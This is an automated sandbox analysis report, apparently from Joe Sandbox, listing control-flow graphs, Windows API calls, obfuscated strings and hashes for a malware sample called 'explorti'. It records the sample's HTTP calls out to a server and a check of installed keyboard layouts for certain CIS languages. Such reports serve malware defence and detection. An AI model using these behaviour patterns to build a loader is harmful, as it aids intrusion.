__cftof __dosmaperr 14206->14204 14207->14206 14209 6d03ea 14207->14209 14210 6d040c 14209->14210 14212 6d0410 __cftof __dosmaperr 14209->14212 14210->14212 14213 6cfb7f 14210->14213 14212->14206 14214 6cfbcc 14213->14214 14215 6c683a __fassign 4 API calls 14214->14215 14219 6cfbdb __cftof 14215->14219 14216 6cd2e9 4 API calls 14216->14219 14217 6cc4ea GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap __fassign 14217->14219 14218 6cfe7b 14218->14212 14218->14218 14219->14216 14219->14217 14219->14218 14221 69bdb2 14220->14221 14223 69c14e shared_ptr 14220->14223 14222 69bdc6 InternetOpenW InternetConnectA 14221->14222 14221->14223 14224 69be3d 14222->14224 14223->14143 14225 69be53 HttpOpenRequestA 14224->14225 14226 69be71 shared_ptr 14225->14226 14227 69bf13 HttpSendRequestA 14226->14227 14229 69bf2b shared_ptr 14227->14229 14228 69bfb3 InternetReadFile 14230 69bfda 14228->14230 14229->14228 14640 6a9310 14641 6a9325 14640->14641 14645 6a9363 14640->14645 14642 6ad041 SleepConditionVariableCS 14641->14642 14643 6a932f 14642->14643 14644 6acff7 RtlWakeAllConditionVariable 14643->14644 14643->14645 14644->14645

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 760 69bd60-69bdac 761 69c1a1-69c1c6 call 6a7f30 760->761 762 69bdb2-69bdb6 760->762 767 69c1c8-69c1d4 761->767 768 69c1f4-69c20c 761->768 762->761 764 69bdbc-69bdc0 762->764 764->761 766 69bdc6-69be4f InternetOpenW InternetConnectA call 6a7870 call 695b20 764->766 792 69be51 766->792 793 69be53-69be6f HttpOpenRequestA 766->793 771 69c1ea-69c1f1 call 6ad593 767->771 772 69c1d6-69c1e4 767->772 773 69c158-69c170 768->773 774 69c212-69c21e 768->774 771->768 772->771 778 69c26f-69c274 call 6c6b9a 772->778 775 69c243-69c25f call 6acf21 773->775 776 69c176-69c182 773->776 780 69c14e-69c155 call 6ad593 774->780 781 69c224-69c232 774->781 782 69c239-69c240 call 6ad593 776->782 783 69c188-69c196 776->783 780->773 781->778 789 69c234 781->789 782->775 783->778 791 69c19c 783->791 789->780 791->782 792->793 798 69be71-69be80 793->798 799 69bea0-69bf0f call 6a7870 call 695b20 call 6a7870 call 695b20 793->799 800 69be82-69be90 798->800 801 69be96-69be9d call 6ad593 798->801 812 69bf11 799->812 813 69bf13-69bf29 HttpSendRequestA 799->813 800->801 801->799 812->813 814 69bf2b-69bf3a 813->814 815 69bf5a-69bf82 813->815 816 69bf3c-69bf4a 814->816 817 69bf50-69bf57 call 6ad593 814->817 818 69bfb3-69bfd4 InternetReadFile 815->818 819 69bf84-69bf93 815->819 816->817 817->815 820 69bfda 818->820 822 69bfa9-69bfb0 call 6ad593 819->822 823 69bf95-69bfa3 819->823 824 69bfe0-69c090 call 6c4180 820->824 822->818 823->822
                    APIs
                    • InternetOpenW.WININET(006E8D68,00000000,00000000,00000000,00000000), ref: 0069BDED
                    • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0069BE11
                    • HttpOpenRequestA.WININET(?,00000000), ref: 0069BE5A
                    • HttpSendRequestA.WININET(?,00000000), ref: 0069BF1A
                    • InternetReadFile.WININET(?,?,000003FF,?), ref: 0069BFCD
                    • InternetCloseHandle.WININET(?), ref: 0069C0A7
                    • InternetCloseHandle.WININET(?), ref: 0069C0AF
                    • InternetCloseHandle.WININET(?), ref: 0069C0B7
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                    • String ID: 6JLUcBRYEz9=$6JLUcxtnEx==$PG3NVu==$PoPn$d4o$invalid stoi argument$stoi argument out of range
                    • API String ID: 688256393-2268519430
                    • Opcode ID: 5711c7c71e747a110d88c139b0ad292ada4e2171c79ba3e886d7d6b1d2aa83cd
                    • Instruction ID: fe866a11a8adf3534f2e1dde47a5e48006700db9356906cbdc2bae11256da3e8
                    • Opcode Fuzzy Hash: 5711c7c71e747a110d88c139b0ad292ada4e2171c79ba3e886d7d6b1d2aa83cd
                    • Instruction Fuzzy Hash: 0AB1D2B1A001189BEF24DF28CD84BEEBB6AEF45314F5041ADF50997681D7719AC0CF99
                    APIs
                      • Part of subcall function 006A7870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 006A795C
                      • Part of subcall function 006A7870: __Cnd_destroy_in_situ.LIBCPMT ref: 006A7968
                      • Part of subcall function 006A7870: __Mtx_destroy_in_situ.LIBCPMT ref: 006A7971
                      • Part of subcall function 0069BD60: InternetOpenW.WININET(006E8D68,00000000,00000000,00000000,00000000), ref: 0069BDED
                      • Part of subcall function 0069BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0069BE11
                      • Part of subcall function 0069BD60: HttpOpenRequestA.WININET(?,00000000), ref: 0069BE5A
                    • std::_Xinvalid_argument.LIBCPMT ref: 006A4EA2
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                    • String ID: 0657d1$246122658369$6YK0$7470$75G0$7JS0$84K0$85K3cq==$8IG0$8lU=$9YY0$9pG0$Dy==$IEYUMK==$KIG+$KIK+$TZC0$TZS0$Toe0$UIU0$stoi argument out of range$-o
                    • API String ID: 2414744145-3083535771
                    • Opcode ID: 064077b7f1c815a681dfca1bb19931d3fcef02e58b14b96f5d1151fa8775b733
                    • Instruction ID: da52df81b2c448ea3d5001c782d8ceec48c681a54a136dedc4ed50263ef5e807
                    • Opcode Fuzzy Hash: 064077b7f1c815a681dfca1bb19931d3fcef02e58b14b96f5d1151fa8775b733
                    • Instruction Fuzzy Hash: 9523F371E001588BEB19EB28CD8979DBB77AB82304F5481DCE009AB2C6DB759F84CF55

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 915 695df0-695eee 921 695f18-695f25 call 6acf21 915->921 922 695ef0-695efc 915->922 924 695f0e-695f15 call 6ad593 922->924 925 695efe-695f0c 922->925 924->921 925->924 927 695f26-6960ad call 6c6b9a call 6ae080 call 6a7f30 * 5 RegOpenKeyExA 925->927 944 696478-696481 927->944 945 6960b3-696143 call 6c4020 927->945 947 6964ae-6964b7 944->947 948 696483-69648e 944->948 971 696149-69614d 945->971 972 696466-696472 945->972 949 6964b9-6964c4 947->949 950 6964e4-6964ed 947->950 952 696490-69649e 948->952 953 6964a4-6964ab call 6ad593 948->953 954 6964da-6964e1 call 6ad593 949->954 955 6964c6-6964d4 949->955 956 69651a-696523 950->956 957 6964ef-6964fa 950->957 952->953 958 69659e-6965a3 call 6c6b9a 952->958 953->947 954->950 955->954 955->958 966 69654c-696555 956->966 967 696525-696530 956->967 963 6964fc-69650a 957->963 964 696510-696517 call 6ad593 957->964 963->958 963->964 964->956 968 696582-69659d call 6acf21 966->968 969 696557-696566 966->969 975 696542-696549 call 6ad593 967->975 976 696532-696540 967->976 978 696578-69657f call 6ad593 969->978 979 696568-696576 969->979 980 696460 971->980 981 696153-696187 RegEnumValueW 971->981 972->944 975->966 976->958 976->975 978->968 979->958 979->978 980->972 986 69644d-696454 981->986 987 69618d-6961ad 981->987 986->981 990 69645a 986->990 992 6961b0-6961b9 987->992 990->980 992->992 993 6961bb-69624d call 6a7c50 call 6a8090 call 6a7870 * 2 call 695c60 992->993 993->986
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                    • API String ID: 0-3963862150
                    • Opcode ID: 9e6f979058bacdfbbe6d967ef3e38bbbff8c658defdb92cacd1be8567acc6b74
                    • Instruction ID: 0dccbd5ccdec16ae3e4e165f3b9ef2e2e335de9bfb23887022f321017dc9e0c9
                    • Opcode Fuzzy Hash: 9e6f979058bacdfbbe6d967ef3e38bbbff8c658defdb92cacd1be8567acc6b74
                    • Instruction Fuzzy Hash: 75E18C71900218ABEF25DFA4CC89BDDB7BAEB05304F5042D9E409A7691D774AFC48F51

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1003 697d00-697d82 call 6c4020 1007 697d88-697db0 call 6a7870 call 695b20 1003->1007 1008 69827e-69829b call 6acf21 1003->1008 1015 697db2 1007->1015 1016 697db4-697dd6 call 6a7870 call 695b20 1007->1016 1015->1016 1021 697dd8 1016->1021 1022 697dda-697df3 1016->1022 1021->1022 1025 697df5-697e04 1022->1025 1026 697e24-697e4f 1022->1026 1027 697e1a-697e21 call 6ad593 1025->1027 1028 697e06-697e14 1025->1028 1029 697e51-697e60 1026->1029 1030 697e80-697ea1 1026->1030 1027->1026 1028->1027 1031 69829c call 6c6b9a 1028->1031 1033 697e62-697e70 1029->1033 1034 697e76-697e7d call 6ad593 1029->1034 1035 697ea3-697ea5 GetNativeSystemInfo 1030->1035 1036 697ea7-697eac 1030->1036 1044 6982a1-6982a6 call 6c6b9a 1031->1044 1033->1031 1033->1034 1034->1030 1040 697ead-697eb6 1035->1040 1036->1040 1042 697eb8-697ebf 1040->1042 1043 697ed4-697ed7 1040->1043 1046 698279 1042->1046 1047 697ec5-697ecf 1042->1047 1048 697edd-697ee6 1043->1048 1049 69821f-698222 1043->1049 1046->1008 1051 698274 1047->1051 1052 697ef9-697efc 1048->1052 1053 697ee8-697ef4 1048->1053 1049->1046 1054 698224-69822d 1049->1054 1051->1046 1056 6981fc-6981fe 1052->1056 1057 697f02-697f09 1052->1057 1053->1051 1058 69822f-698233 1054->1058 1059 698254-698257 1054->1059 1060 69820c-69820f 1056->1060 1061 698200-69820a 1056->1061 1062 697fe9-6981e5 call 6a7870 call 695b20 call 6a7870 call 695b20 call 695c60 call 6a7870 call 695b20 call 695640 call 6a7870 call 695b20 call 6a7870 call 695b20 call 695c60 call 6a7870 call 695b20 call 695640 call 6a7870 call 695b20 call 6a7870 call 695b20 call 695c60 call 6a7870 call 695b20 call 695640 1057->1062 1063 697f0f-697f6b call 6a7870 call 695b20 call 6a7870 call 695b20 call 695c60 1057->1063 1064 698248-698252 1058->1064 1065 698235-69823a 1058->1065 1066 698259-698263 1059->1066 1067 698265-698271 1059->1067 1060->1046 1069 698211-69821d 1060->1069 1061->1051 1102 6981eb-6981f4 1062->1102 1088 697f70-697f77 1063->1088 1064->1046 1065->1064 1071 69823c-698246 1065->1071 1066->1046 1067->1051 1069->1051 1071->1046 1090 697f79 1088->1090 1091 697f7b-697f9b call 6c8a81 1088->1091 1090->1091 1097 697f9d-697fac 1091->1097 1098 697fd2-697fd4 1091->1098 1100 697fae-697fbc 1097->1100 1101 697fc2-697fcf call 6ad593 1097->1101 1098->1102 1103 697fda-697fe4 1098->1103 1100->1044 1100->1101 1101->1098 1102->1049 1105 6981f6 1102->1105 1103->1102 1105->1056
                    APIs
                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00697EA3
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID: HlurNa==$HlurOK==$HlusMa==
                    • API String ID: 1721193555-2203186029
                    • Opcode ID: 0467685a07af45a74d2988cc3296480234bc785541c8434b2a39c1d70e9048bd
                    • Instruction ID: ed8294e8fb1d1cac8eef5914ae00e88e41b07cfd0c192c11b6235316058bfad9
                    • Opcode Fuzzy Hash: 0467685a07af45a74d2988cc3296480234bc785541c8434b2a39c1d70e9048bd
                    • Instruction Fuzzy Hash: 1ED10571E006189BDF14BB28CC5A3AD7777AB42320F50429CE4066B7C2DB758F918BD6

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1141 6c6e01-6c6e36 GetFileType 1142 6c6e3c-6c6e47 1141->1142 1143 6c6eee-6c6ef1 1141->1143 1146 6c6e69-6c6e85 call 6c4020 GetFileInformationByHandle 1142->1146 1147 6c6e49-6c6e5a call 6c7177 1142->1147 1144 6c6f1a-6c6f42 1143->1144 1145 6c6ef3-6c6ef6 1143->1145 1150 6c6f5f-6c6f61 1144->1150 1151 6c6f44-6c6f57 1144->1151 1145->1144 1148 6c6ef8-6c6efa 1145->1148 1155 6c6f0b-6c6f18 call 6c740d 1146->1155 1162 6c6e8b-6c6ecd call 6c70c9 call 6c6f71 * 3 1146->1162 1158 6c6f07-6c6f09 1147->1158 1159 6c6e60-6c6e67 1147->1159 1154 6c6efc-6c6f01 call 6c7443 1148->1154 1148->1155 1153 6c6f62-6c6f70 call 6acf21 1150->1153 1151->1150 1164 6c6f59-6c6f5c 1151->1164 1154->1158 1155->1158 1158->1153 1159->1146 1177 6c6ed2-6c6eea call 6c7096 1162->1177 1164->1150 1177->1150 1180 6c6eec 1177->1180 1180->1158
                    APIs
                    • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 006C6E23
                    • GetFileInformationByHandle.KERNELBASE(?,?), ref: 006C6E7D
                    • __dosmaperr.LIBCMT ref: 006C6F12
                      • Part of subcall function 006C7177: __dosmaperr.LIBCMT ref: 006C71AC
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: File__dosmaperr$HandleInformationType
                    • String ID:
                    • API String ID: 2531987475-0
                    • Opcode ID: 214ceae986b7b1514f56ca1d861e5c8b113abeb1f51bc9bdbb3ed662c8b4ace1
                    • Instruction ID: 1cdd38171965f211317df20e229ceaa2f1df84b9a68b789b4844f174ddf75aa4
                    • Opcode Fuzzy Hash: 214ceae986b7b1514f56ca1d861e5c8b113abeb1f51bc9bdbb3ed662c8b4ace1
                    • Instruction Fuzzy Hash: 4F413D75900244ABDB24EFB5E841EBBBBFBEF89304B14842DF556D3610EB30A905CB65

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1356 6cd4f4-6cd515 call 6adeb0 1359 6cd52f-6cd532 1356->1359 1360 6cd517 1356->1360 1361 6cd54e-6cd55a call 6ca688 1359->1361 1363 6cd534-6cd537 1359->1363 1360->1361 1362 6cd519-6cd51f 1360->1362 1373 6cd55c-6cd55f 1361->1373 1374 6cd564-6cd570 call 6cd47e 1361->1374 1364 6cd521-6cd525 1362->1364 1365 6cd543-6cd54c call 6cd43c 1362->1365 1363->1365 1366 6cd539-6cd53c 1363->1366 1364->1361 1369 6cd527-6cd52b 1364->1369 1381 6cd58c-6cd595 1365->1381 1370 6cd53e-6cd541 1366->1370 1371 6cd572-6cd582 call 6c7443 call 6c6b8a 1366->1371 1369->1371 1375 6cd52d 1369->1375 1370->1365 1370->1371 1371->1373 1378 6cd6cb-6cd6da 1373->1378 1374->1371 1388 6cd584-6cd589 1374->1388 1375->1365 1384 6cd597-6cd59f call 6c8c8b 1381->1384 1385 6cd5a2-6cd5b3 1381->1385 1384->1385 1386 6cd5c9 1385->1386 1387 6cd5b5-6cd5c7 1385->1387 1391 6cd5cb-6cd5dc 1386->1391 1387->1391 1388->1381 1393 6cd5de-6cd5e0 1391->1393 1394 6cd64a-6cd65a call 6cd687 1391->1394 1396 6cd6db-6cd6dd 1393->1396 1397 6cd5e6-6cd5e8 1393->1397 1403 6cd65c-6cd65e 1394->1403 1404 6cd6c9 1394->1404 1401 6cd6df-6cd6e6 call 6c8cd3 1396->1401 1402 6cd6e7-6cd6fa call 6c651d 1396->1402 1399 6cd5ea-6cd5ed 1397->1399 1400 6cd5f4-6cd600 1397->1400 1399->1400 1405 6cd5ef-6cd5f2 1399->1405 1406 6cd640-6cd648 1400->1406 1407 6cd602-6cd617 call 6cd4eb * 2 1400->1407 1401->1402 1420 6cd6fc-6cd706 1402->1420 1421 6cd708-6cd70e 1402->1421 1411 6cd699-6cd6a2 1403->1411 1412 6cd660-6cd676 call 6ca531 1403->1412 1404->1378 1405->1400 1413 6cd61a-6cd61c 1405->1413 1406->1394 1407->1413 1431 6cd6a5-6cd6a8 1411->1431 1412->1431 1413->1406 1419 6cd61e-6cd62e 1413->1419 1425 6cd630-6cd635 1419->1425 1420->1421 1427 6cd73c-6cd747 call 6c7443 1420->1427 1428 6cd727-6cd738 RtlAllocateHeap 1421->1428 1429 6cd710-6cd711 1421->1429 1425->1394 1426 6cd637-6cd63e 1425->1426 1426->1425 1439 6cd749-6cd74b 1427->1439 1433 6cd73a 1428->1433 1434 6cd713-6cd71a call 6c9c81 1428->1434 1429->1428 1436 6cd6aa-6cd6ad 1431->1436 1437 6cd6b4-6cd6bc 1431->1437 1433->1439 1434->1427 1446 6cd71c-6cd725 call 6c8cf9 1434->1446 1436->1437 1441 6cd6af-6cd6b2 1436->1441 1437->1404 1442 6cd6be-6cd6c6 call 6ca531 1437->1442 1441->1404 1441->1437 1442->1404 1446->1427 1446->1428
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: hpGl
                    • API String ID: 0-1880857617
                    • Opcode ID: b560b375ed23ef847624de88f62062782bc048b72e15a6b80cbb228b1ab64477
                    • Instruction ID: ff9f75e4178e0725836d360a71c641ac41d4199ba128849e0bd263216668d3ec
                    • Opcode Fuzzy Hash: b560b375ed23ef847624de88f62062782bc048b72e15a6b80cbb228b1ab64477
                    • Instruction Fuzzy Hash: 7761EF729002149BDF25EFA9D885FFDB7A3EB55318F24813EE449AB390D6309C01CBA5

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1450 6982b0-698331 call 6c4020 1454 69833d-698365 call 6a7870 call 695b20 1450->1454 1455 698333-698338 1450->1455 1463 698369-69838b call 6a7870 call 695b20 1454->1463 1464 698367 1454->1464 1456 69847f-69849b call 6acf21 1455->1456 1469 69838d 1463->1469 1470 69838f-6983a8 1463->1470 1464->1463 1469->1470 1473 6983d9-698404 1470->1473 1474 6983aa-6983b9 1470->1474 1477 698431-698452 1473->1477 1478 698406-698415 1473->1478 1475 6983bb-6983c9 1474->1475 1476 6983cf-6983d6 call 6ad593 1474->1476 1475->1476 1481 69849c-6984a1 call 6c6b9a 1475->1481 1476->1473 1479 698458-69845d 1477->1479 1480 698454-698456 GetNativeSystemInfo 1477->1480 1483 698427-69842e call 6ad593 1478->1483 1484 698417-698425 1478->1484 1485 69845e-698465 1479->1485 1480->1485 1483->1477 1484->1481 1484->1483 1485->1456 1492 698467-69846f 1485->1492 1493 698478-69847b 1492->1493 1494 698471-698476 1492->1494 1493->1456 1495 69847d 1493->1495 1494->1456 1495->1456
                    APIs
                    • GetNativeSystemInfo.KERNELBASE(?), ref: 00698454
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID:
                    • API String ID: 1721193555-0
                    • Opcode ID: 4d1300d9b14b9a821fe7247954227179a3245b22739c819e3a5159865679dd72
                    • Instruction ID: 3f2e4a1f702d25124f88202605efe9a589e59b53dffac64e42050f2e7de08921
                    • Opcode Fuzzy Hash: 4d1300d9b14b9a821fe7247954227179a3245b22739c819e3a5159865679dd72
                    • Instruction Fuzzy Hash: 25514871D002189FEF14EB68CD457EDB7BAEF46704F5042A9E805A7781EF349E808BA5

                    Control-flow Graph

                    • Executed
                    • Not Executed
